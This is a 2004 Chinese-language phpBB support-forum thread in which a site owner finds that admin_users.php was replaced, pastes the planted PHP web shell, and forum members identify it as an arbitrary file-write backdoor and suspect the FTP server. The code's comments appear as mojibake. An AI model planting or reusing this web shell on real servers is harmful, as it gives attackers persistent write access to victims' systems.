第 1 頁 (共 1 頁)
[問題]請問這是被駭了嗎?
發表於 : 2004-12-13 11:57
由 jhung
●架設主機作業系統:Windows Xp Pro SP2 有開防火牆
●快速架站程式:Appserv
●您的上網方式:ADSL
●您的 phpBB2 版本:phpBB 2.0.6
●您的 domain(網域名稱) :
www.gamejo.com
●您的 phpBB2 連結網址:
http://www.gamejo.com
●錯誤狀態:
原本後台這個區域沒有東西的,這兩天沒進後台,今天一進去後台管理就出現這個欄位,]
保存文件名...這個區域...還是簡體的...
我已經很久很久沒有再加裝外掛了~
請問這是被駭了嗎?
發表於 : 2004-12-13 12:05
由 Martinet
應該是=口=...如果沒有其他人有修改權限的話..就是...|||
發表於 : 2004-12-13 12:16
由 jhung
Martinet 寫:應該是=口=...如果沒有其他人有修改權限的話..就是...|||
是的~沒有其他人有修改權限...
糟糕...我對程式碼不熟...不知道去哪改囉...
先從admin.php和.TPL找起了...
唉...駭我的小香蕉做什麼...
發表於 : 2004-12-13 13:35
由 jhung
找到一個他們改過的檔案admin_users.php
整個檔案被改成以下內容~
不過不知道什麼作用\r
有人可以幫忙看一下嗎?
代碼: 選擇全部
<?php
// Codz by angel on 2004, May 26
// Powered by Security Angel Team
// 壺蛌砱趼睫\r
function stripslashes_array(&$array) {
while(list($key,$var) = each($array)) {
if ($key != 'argc' && $key != 'argv' && (strtoupper($key) != $key || ''.intval($key) == "$key")) {
if (is_string($var)) {
$array[$key] = stripslashes($var);
}
if (is_array($var)) {
$array[$key] = stripslashes_array($var);
}
}
}
return $array;
}
// 瓚剿 magic_quotes_gpc 袨怓
if (get_magic_quotes_gpc()) {
$_POST = stripslashes_array($_POST);
}
// 硒俴紱釬\r
if($_POST['action']=="create")
{
$fp=@fopen("".$_POST['filename']."","wb");
$content = $_POST['filedate'];
$fw=@fwrite($fp,$content);
if ($fw) {
echo "<b>鳩炰ㄛ迡恅璃傖髡ㄐ</b><a href=".$PHP_SELF.">殿隙</a>";
exit;
} else {
echo "<b>迡恅璃囮啖ㄛ岆祥岆癹腔恀枙ˋ</b><a href=".$PHP_SELF.">殿隙</a>";
}
@fclose($fp);
}
?>
<form action="<?=$PHP_SELF?>" method="post">
悵湔腔恅璃靡(:<font color="#FF0000">angel.php</font>):<br>
<input type="text" name="filename" size="60">
<p>
恅璃悵湔婓:<br>
<?=str_replace('\\\','/',dirname(__FILE__))?>
<p>
恅璃囀:<br>
<textarea name="filedate" cols="60" rows="10"></textarea><br>
<input type="hidden" name="action" value="create"><input type="submit" value="悵湔">
</form>
<b>蛁砩ㄩ絞衄眈肮腔恅璃湔婓奀ㄛ蔚俇蜊迡囀ㄐ</b>
發表於 : 2004-12-13 13:41
由 webspirit
發表於 : 2004-12-13 18:14
由 jhung
經朋友幫忙看~確定是被駭了~~
我用XP SP2 有開防火牆
我的PHPBB系統是 2.0.6
朋友説:
那支新的程式是一個檔案上傳的程式, 基本上駭客如果能放檔案到你的電腦上 他不需要放一支檔案上傳程式吧 感覺多此一舉。
PHPBB不太可能有這麼大的BUG,有可能是FTP有漏洞。
我決定升級PHPBB版本,換掉原本用的FTP伺服器軟體
給大家做參考
發表於 : 2004-12-13 18:31
由 jackyilk
您能提供一下您所使用的FTP伺服器軟體嗎?
這樣讓有使用的人也可以警覺一下~
發表於 : 2004-12-13 20:07
由 webspirit
這麼說不是 phpBB 的問題而是 FTP Server software 的問題囉
發表於 : 2004-12-14 14:10
由 文
蠻好笑的...他還幫你寫個免費的上傳程式....哈哈哈(閃人~)
發表於 : 2004-12-14 20:08
由 jhung
jackyilk 寫:您能提供一下您所使用的FTP伺服器軟體嗎?
這樣讓有使用的人也可以警覺一下~
我原本是用這套
TYPSoft FTP Server
蠻陽春的~
線在在考慮整個討論區再升級了...可是...又回到資料庫不相容的問題了...
好煩阿~~~
發表於 : 2004-12-14 20:12
由 design
jhung 寫:
唉...駭我的小香蕉做什麼...
對不起.. 我正在吃飯.. 笑到噴飯
這句太爆笑了 抱歉
應該替你感到婉息才對..
發表於 : 2004-12-15 22:23
由 joly
大陸高手很多,這不算慘,都進到後台了,沒真的駭掉你的小香蕉,他目的只是在示威,呵呵!
發表於 : 2004-12-15 23:45
由 [ffs]hunej
是有駭客作這檔事是為了提醒user注重安全性啦...
不過也不必這樣做吧......